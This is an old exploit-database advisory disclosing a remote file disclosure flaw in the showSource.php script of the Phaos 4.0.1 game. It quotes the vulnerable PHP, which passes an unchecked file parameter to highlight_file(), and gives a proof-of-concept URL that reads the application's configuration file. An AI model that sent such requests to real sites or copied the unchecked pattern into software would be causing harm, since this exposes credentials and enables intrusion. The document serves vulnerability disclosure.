####################################################################################
}}} Remote File Disclosure Vulnerability {{{
in (showSource.php) phaos4.0.1
MY HOmE : WWW.PAL-HACkEr.COM WWW.ATSDP.COM
####################################################################################
## AUTHOR : HaCkeR_EgY
## My HoMe : www.PaL-HaCker.com & www.ATSDP.com
## ConTacT : hacker_egy@hotmail.com
-----------------------------------------------
## script: phaos4.0.1
##download:http://sourceforge.net/project/showfiles.php?group_id=111506
###################################################################
### vurn C0dE :
## line 16:
showSource($file, $line, $prev, $next); <=====
function showSource($file, $line, $prev = 10, $next = 10) {
if (!(file_exists($file) && is_file($file))) {
return trigger_error("showSource() failed, file does not exist `$file`", E_USER_ERROR);
return false;
}
//read code
## line 35 : ob_start();
highlight_file($file); <<========
$data = ob_get_contents();
ob_end_clean();
## P0C:
http://localhost/[path]/erorr/showSource.php?file=config_settings.php
#################################################################################
## GREETZ TO : My BrOther and My MasTer " Abo Mohamed " ADMIN PAL-HACKER
## Thanx : F0UaD Pr0gRaMeR , FiReSell , MoHamed EL Arab , Mr.exe , zaradusht , and all " pal-hacker members "
#####################################################################################
# milw0rm.com [2008-04-09]